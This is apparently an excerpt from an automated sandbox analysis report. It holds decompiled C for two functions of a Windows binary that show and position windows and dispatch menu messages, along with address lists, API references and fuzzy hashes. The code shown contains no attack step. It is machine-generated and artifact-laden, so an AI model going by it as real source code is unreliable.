				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x45555a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2ec) & 0x00000004) != 0) {
					_t294 =  *0x48e84c; // 0x41d0e4
					E00406520(_t294,  &_v12);
					E0040A0E8(_v12, 1);
					E00403D80();
				}
				_t149 =  *0x48fbfc; // 0x2131310
				E004595C8(_t149);
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000004;
				_push(_t372);
				_push(0x45553d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x455444);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037B0(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x48fc00; // 0x2130f1c
						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
							__eflags = 0;
							E004541DC(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2ec) & 0x00000008;
							if(( *(_t163 + 0x2ec) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E0043F370(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E0043F370(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E0044FE3C(E0043F370(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E0043F370(_v8), 0);
								} else {
									SetWindowPos(E0043F370(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E0043F370(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E0043C9EC(_v8);
						}
					} else {
						_push(_t372);
						_push(0x4550a8);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037B0(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E00456820() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E00456814() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x48fbfc; // 0x2131310
								_t305 = E004386C0( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x48fbfc; // 0x2131310
								_t248 = E00438704( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E00453490(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E00456850() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E00456844() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x48fbfc; // 0x2131310
										_t311 = E004386C0( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x48fbfc; // 0x2131310
										_t269 = E00438704( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x48fbfc; // 0x2131310
								_t370 =  *(_t270 + 0x44);
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x44e7cc; // 0x44e818
									_t290 = E00403740( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E00456820() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E00456814() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E00453490(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E0043F370(_v8),  *(0x471b98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E0043F370(_v8),  *(0x471b98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x406d00, E0043F370(_v8), 5, 0, _t220);
								E00438F1C();
							} else {
								_t231 = E0043F370(_v8);
								_t232 =  *0x48fbfc; // 0x2131310
								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
								ShowWindow(E0043F370(_v8), 3);
							}
							_t226 =  *0x48fbfc; // 0x2131310
							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x455544);
				_t154 = _v8;
				 *(_t154 + 0x2ec) =  *(_t154 + 0x2ec) & 0x000000fb;
				return _t154;
			}

0x00454ff1
0x00454ff3
0x00454ffb
0x00454ffe
0x00455003
0x00455004
0x00455009
0x0045500c
0x00455016
0x00455027
0x0045502c
0x0045503b
0x00455040
0x00455040
0x00455045
0x0045504a
0x00455052
0x0045505b
0x0045505c
0x00455061
0x00455064
0x0045506e
0x00455074
0x00455077
0x0045507e
0x00455422
0x00455423
0x00455428
0x0045542b
0x00455435
0x0045543f
0x0045545b
0x00455463
0x00455466
0x00455468
0x0045546d
0x0045546d
0x00455472
0x00455475
0x0045547c
0x0045548b
0x0045548e
0x00455495
0x004554b6
0x004554bb
0x004554c2
0x004554c7
0x004554c9
0x004554d4
0x004554d9
0x004554db
0x004554ea
0x004554ea
0x004554db
0x004554ec
0x004554ee
0x00455520
0x004554f0
0x00455508
0x0045550e
0x0045550e
0x00455497
0x004554af
0x004554af
0x0045547e
0x00455481
0x00455481
0x00455084
0x00455086
0x00455087
0x0045508c
0x0045508f
0x00455099
0x004550a3
0x004550c9
0x004550f5
0x0045513e
0x0045513e
0x00455141
0x00455143
0x00455145
0x00455145
0x00455155
0x00455155
0x00455158
0x0045515a
0x0045515c
0x0045515c
0x004550f7
0x004550f7
0x00455109
0x0045510c
0x0045510e
0x00455110
0x00455110
0x00455113
0x00455123
0x00455126
0x00455128
0x0045512a
0x0045512a
0x00455128
0x00455161
0x00455163
0x00455163
0x00455167
0x00455169
0x00455169
0x00455179
0x00455182
0x0045518f
0x00455198
0x00455198
0x004551a2
0x004551a5
0x004551b0
0x004551b3
0x00455287
0x00455289
0x0045528f
0x00455292
0x00455299
0x004552e2
0x004552e2
0x004552e5
0x004552e7
0x004552e9
0x004552e9
0x004552f9
0x004552f9
0x004552fc
0x004552fe
0x00455300
0x00455300
0x0045529b
0x0045529b
0x004552ad
0x004552ad
0x004552b0
0x004552b2
0x004552b4
0x004552b4
0x004552b7
0x004552c7
0x004552c7
0x004552ca
0x004552cc
0x004552ce
0x004552ce
0x004552cc
0x00455303
0x00455305
0x00455307
0x00455307
0x00455307
0x00455309
0x0045530b
0x0045530d
0x0045530d
0x0045530d
0x00455326
0x00455326
0x004551b9
0x004551b9
0x004551be
0x004551c1
0x004551c4
0x004551cb
0x004551d3
0x004551d9
0x004551de
0x004551e0
0x004551e5
0x004551e5
0x004551e0
0x004551e8
0x004551ea
0x00455223
0x00455223
0x00455226
0x00455228
0x0045522a
0x0045522a
0x0045523a
0x0045523a
0x0045523d
0x0045523f
0x00455241
0x00455241
0x004551ec
0x004551f2
0x004551f2
0x004551f5
0x004551f7
0x004551f9
0x004551f9
0x004551fc
0x00455205
0x00455205
0x00455208
0x0045520a
0x0045520c
0x0045520c
0x0045520f
0x0045520f
0x00455244
0x00455246
0x00455248
0x00455248
0x00455248
0x0045524a
0x0045524c
0x0045524e
0x0045524e
0x0045524e
0x0045525e
0x00455267
0x0045526d
0x00455270
0x00455274
0x0045527d
0x0045527d
0x00455274
0x004551b3
0x0045532f
0x00455340
0x00455416
0x00455346
0x00455350
0x004553a3
0x004553b7
0x004553b7
0x004553cc
0x004553d4
0x00455352
0x00455357
0x00455362
0x00455371
0x00455381
0x00455381
0x004553e2
0x004553f1
0x004553f1
0x00455340
0x0045507e
0x00455527
0x0045552a
0x0045552d
0x00455532
0x00455535
0x0045553c

APIs

SendMessageA.USER32 ref: 00455371

Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadMessageSendString
String ID:
API String ID: 1946433856-0
Opcode ID: 39f0062770d71e082892c8cbb726ffb7484574a5ae4c4b0cfde5a815cb9704f4
Instruction ID: b3ea27c8242e0219a5722fe99f0ebfdc8d125783df85781ec40d31c2334c09d7
Opcode Fuzzy Hash: 39f0062770d71e082892c8cbb726ffb7484574a5ae4c4b0cfde5a815cb9704f4
Instruction Fuzzy Hash: D5F15E70A00A04EFD700DBA9D995BAE77F5AB04305F2541B6ED049B3A3D738EE49DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0044CA64, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 405
nativeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0044CA64(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				struct HDC__* _t221;
				void* _t251;
				signed int _t257;
				void* _t265;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				intOrPtr _t307;
				intOrPtr _t311;
				intOrPtr _t333;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t353;
				signed int _t355;
				intOrPtr* _t356;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t375;
				void* _t377;
				void* _t378;
				intOrPtr _t379;
				void* _t380;

				_t377 = _t378;
				_t379 = _t378 + 0xffffffd0;
				_v52 = 0;
				_t375 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x44cf97);
				_push( *[fs:eax]);
				 *[fs:eax] = _t379;
				_t137 =  *__edx;
				_t380 = _t137 - 0x111;
				if(_t380 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t271;
						if(_t271 < 0) {
							goto L67;
						} else {
							_t272 = _t271 + 1;
							_t367 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E0044BE10(E004140D0(_v8, _t367),  *(_t375 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t367 = _t367 + 1;
								_t272 = _t272 - 1;
								__eflags = _t272;
								if(_t272 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t274;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x48e6ec; // 0x48fbfc
								E004594D8( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t275 = _t274 + 1;
								_t368 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t375 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t375 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
										}
									}
									_t158 = E004140D0(_v8, _t368);
									_t295 = _v17;
									_v16 = E0044BD54(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t368 = _t368 + 1;
									_t275 = _t275 - 1;
									__eflags = _t275;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E00435E34( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
								_t165 =  *0x48e6ec; // 0x48fbfc
								E004594D8( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t277;
								if(_t277 < 0) {
									goto L67;
								} else {
									_t278 = _t277 + 1;
									_t369 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E004140D0(_v8, _t369);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t375 + 8);
										if(_t173 ==  *(_t375 + 8)) {
											break;
										}
										_t177 = E0044BD54(_v48, 1,  *(_t375 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t369 = _t369 + 1;
											_t278 = _t278 - 1;
											__eflags = _t278;
											if(_t278 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E0044C654(_v48, _t375);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t380 == 0) {
						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t280;
						if(_t280 < 0) {
							goto L67;
						} else {
							_t281 = _t280 + 1;
							_t370 = 0;
							__eflags = 0;
							while(1) {
								E004140D0(_v8, _t370);
								_t181 = E0044BDF4( *(_t375 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t370 = _t370 + 1;
								_t281 = _t281 - 1;
								__eflags = _t281;
								if(_t281 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t283;
							if(_t283 < 0) {
								goto L67;
							} else {
								_t284 = _t283 + 1;
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E0044BD54(E004140D0(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t371 = _t371 + 1;
									_t284 = _t284 - 1;
									__eflags = _t284;
									if(_t284 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0041F908(0, 1);
								_push(_t377);
								_push(0x44cdca);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t377);
								_push(0x44cdad);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								E004202C4(_v24,  *(_v40 + 0x18));
								E00420140(_v24);
								E0044D23C(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t333);
								 *[fs:eax] = _t333;
								_push(0x44cdb4);
								__eflags = 0;
								E004202C4(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t286;
								if(_t286 < 0) {
									goto L67;
								} else {
									_t287 = _t286 + 1;
									_t372 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E0044BD54(E004140D0(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t372 = _t372 + 1;
										_t287 = _t287 - 1;
										__eflags = _t287;
										if(_t287 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_t221 =  *((intOrPtr*)(_v8 + 0x10));
									L00406F30();
									_v32 = _t221;
									 *[fs:eax] = _t379;
									_v24 = E0041F908(0, 1);
									 *[fs:eax] = _t379;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t379;
									E004202C4(_v24, _v32);
									E00420140(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44cecb, _t377,  *[fs:eax], 0x44cee8, _t377,  *[fs:eax], 0x44cf0d, _t377, _t221);
									_pop(_t342);
									 *[fs:eax] = _t342;
									_push(0x44ced2);
									__eflags = 0;
									E004202C4(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t290;
									if(_t290 < 0) {
										goto L67;
									} else {
										_t291 = _t290 + 1;
										_t373 = 0;
										__eflags = 0;
										while(1) {
											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E004140D0(_v8, _t373))) + 0x34))();
											_t346 = _v36;
											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
												_v16 = E0044BD54(E004140D0(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E004140D0(_v8, _t373) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t373 = _t373 + 1;
											_t291 = _t291 - 1;
											__eflags = _t291;
											if(_t291 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t257 = E0044BD84(E004140D0(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t257;
										if(_t257 == 0) {
											_t265 = E004140D0(_v8, _t373);
											__eflags = 0;
											_t257 = E0044BD84(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t353 =  *0x48e838; // 0x48fc00
										_t355 =  *( *_t353 + 0x6c);
										__eflags = _t355;
										if(_t355 != 0) {
											__eflags = _t257;
											if(_t257 == 0) {
												_t257 =  *(_t355 + 0x158);
											}
											_t307 =  *0x48e838; // 0x48fc00
											__eflags =  *(_t355 + 0x228) & 0x00000008;
											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
												_t356 =  *0x48e6ec; // 0x48fbfc
												E00459174( *_t356, _t291, _t307, _t257, _t373, _t375);
											} else {
												E004591DC();
											}
										}
									}
								} else {
									L67:
									_push( *(_t375 + 8));
									_push( *(_t375 + 4));
									_push( *_t375);
									_t144 =  *((intOrPtr*)(_v8 + 0x10));
									_push(_t144);
									L00406D08();
									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
								}
								L68:
								_pop(_t311);
								 *[fs:eax] = _t311;
								_push(0x44cf9e);
								return E00404320( &_v52);
							}
						}
					}
				}
				L69:
			}

0x0044ca65
0x0044ca67
0x0044ca6f
0x0044ca72
0x0044ca74
0x0044ca79
0x0044ca7a
0x0044ca7f
0x0044ca82
0x0044ca85
0x0044ca87
0x0044ca8c
0x0044caae
0x0044caae
0x0044cab3
0x0044cb02
0x0044cb03
0x0044cb05
0x00000000
0x0044cb0b
0x0044cb0b
0x0044cb0c
0x0044cb0c
0x0044cb0e
0x0044cb1b
0x0044cb20
0x0044cb22
0x00000000
0x00000000
0x0044cb28
0x0044cb29
0x0044cb29
0x0044cb2a
0x00000000
0x0044cb2c
0x00000000
0x0044cb2c
0x00000000
0x0044cb2a
0x0044cb0e
0x0044cab5
0x0044cab5
0x0044cab5
0x0044cab8
0x0044cb31
0x0044cb35
0x0044cb39
0x0044cb3b
0x0044cb3b
0x0044cb45
0x0044cb46
0x0044cb48
0x0044cbbe
0x0044cbbe
0x0044cbc7
0x00000000
0x0044cb4a
0x0044cb4a
0x0044cb4b
0x0044cb4b
0x0044cb4d
0x0044cb4d
0x0044cb51
0x0044cb77
0x0044cb53
0x0044cb53
0x0044cb56
0x0044cb58
0x0044cb6a
0x0044cb5a
0x0044cb65
0x0044cb65
0x0044cb58
0x0044cb7f
0x0044cb84
0x0044cb8f
0x0044cb92
0x0044cb96
0x00000000
0x00000000
0x0044cbba
0x0044cbbb
0x0044cbbb
0x0044cbbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044cbbc
0x0044cba1
0x0044cba9
0x0044cbb0
0x0044cbb0
0x0044caba
0x0044caba
0x0044cabb
0x0044cf24
0x0044cf25
0x0044cf27
0x00000000
0x0044cf29
0x0044cf29
0x0044cf2a
0x0044cf2a
0x0044cf2c
0x0044cf36
0x0044cf3e
0x0044cf41
0x0044cf44
0x00000000
0x00000000
0x0044cf4e
0x0044cf53
0x0044cf55
0x0044cf63
0x0044cf64
0x0044cf64
0x0044cf65
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044cf55
0x0044cf5c
0x0044cf5c
0x0044cac1
0x00000000
0x0044cac1
0x0044cabb
0x0044cab8
0x00000000
0x0044ca8e
0x0044ca8e
0x0044cacc
0x0044cacd
0x0044cacf
0x00000000
0x0044cad5
0x0044cad5
0x0044cad6
0x0044cad6
0x0044cad8
0x0044cadd
0x0044cae6
0x0044caeb
0x0044caed
0x00000000
0x00000000
0x0044caf3
0x0044caf4
0x0044caf4
0x0044caf5
0x00000000
0x0044caf7
0x00000000
0x0044caf7
0x00000000
0x0044caf5
0x0044cad8
0x00000000
0x0044ca90
0x0044ca90
0x0044ca93
0x0044ccd6
0x0044ccdf
0x0044cce0
0x0044cce2
0x00000000
0x0044cce8
0x0044cce8
0x0044cce9
0x0044cce9
0x0044cceb
0x0044cd02
0x0044cd05
0x0044cd09
0x00000000
0x00000000
0x0044cdd1
0x0044cdd2
0x0044cdd2
0x0044cdd3
0x00000000
0x0044cdd9
0x00000000
0x0044cdd9
0x00000000
0x0044cdd3
0x0044cd1b
0x0044cd20
0x0044cd21
0x0044cd26
0x0044cd29
0x0044cd38
0x0044cd3d
0x0044cd3e
0x0044cd43
0x0044cd46
0x0044cd52
0x0044cd67
0x0044cd80
0x0044cd87
0x0044cd8a
0x0044cd8d
0x0044cd92
0x0044cd97
0x0044cdac
0x0044cdac
0x0044ca99
0x0044ca99
0x0044ca9a
0x0044cde1
0x0044cdea
0x0044cdeb
0x0044cded
0x00000000
0x0044cdf3
0x0044cdf3
0x0044cdf4
0x0044cdf4
0x0044cdf6
0x0044ce0d
0x0044ce10
0x0044ce14
0x00000000
0x00000000
0x0044cf14
0x0044cf15
0x0044cf15
0x0044cf16
0x00000000
0x0044cf1c
0x00000000
0x0044cf1c
0x00000000
0x0044cf16
0x0044ce1d
0x0044ce21
0x0044ce26
0x0044ce34
0x0044ce43
0x0044ce51
0x0044ce5d
0x0044ce6b
0x0044ce74
0x0044ce89
0x0044cea3
0x0044cea8
0x0044ceab
0x0044ceae
0x0044ceb3
0x0044ceb8
0x0044ceca
0x0044ceca
0x0044caa0
0x0044caa3
0x0044cbd4
0x0044cbdd
0x0044cbde
0x0044cbe0
0x00000000
0x0044cbe6
0x0044cbe6
0x0044cbe7
0x0044cbe7
0x0044cbe9
0x0044cbf5
0x0044cbf8
0x0044cbfb
0x0044cbfe
0x0044cc29
0x0044cc00
0x0044cc0d
0x0044cc0d
0x0044cc2c
0x0044cc30
0x00000000
0x00000000
0x0044ccc6
0x0044ccc7
0x0044ccc7
0x0044ccc8
0x00000000
0x0044ccce
0x00000000
0x0044ccce
0x00000000
0x0044ccc8
0x0044cc48
0x0044cc4d
0x0044cc4f
0x0044cc56
0x0044cc61
0x0044cc63
0x0044cc63
0x0044cc68
0x0044cc70
0x0044cc73
0x0044cc75
0x0044cc7b
0x0044cc7d
0x0044cc84
0x0044cc84
0x0044cc8a
0x0044cc90
0x0044cc97
0x0044ccb3
0x0044ccbc
0x0044cc99
0x0044cca9
0x0044cca9
0x0044cc97
0x0044cc75
0x0044caa9
0x0044cf67
0x0044cf6a
0x0044cf6e
0x0044cf71
0x0044cf75
0x0044cf78
0x0044cf79
0x0044cf7e
0x0044cf7e
0x0044cf81
0x0044cf83
0x0044cf86
0x0044cf89
0x0044cf96
0x0044cf96
0x0044ca9a
0x0044ca93
0x0044ca8e
0x00000000

APIs

SaveDC.GDI32(?), ref: 0044CD33
RestoreDC.GDI32(?,?), ref: 0044CDA7
7378B080.USER32(?,00000000,0044CF97), ref: 0044CE21
SaveDC.GDI32(?), ref: 0044CE58
RestoreDC.GDI32(?,?), ref: 0044CEC5
NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044CF97), ref: 0044CF79

Strings

p=C, xrefs: 0044CD11, 0044CE39

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSave$7378B080NtdllProc_Window
String ID: p=C
API String ID: 1084412598-781052374
Opcode ID: ecd796a03a1bf8d7f912e6def723b700ee3b50c9dbf1fa4703c2640c3da3a0ac
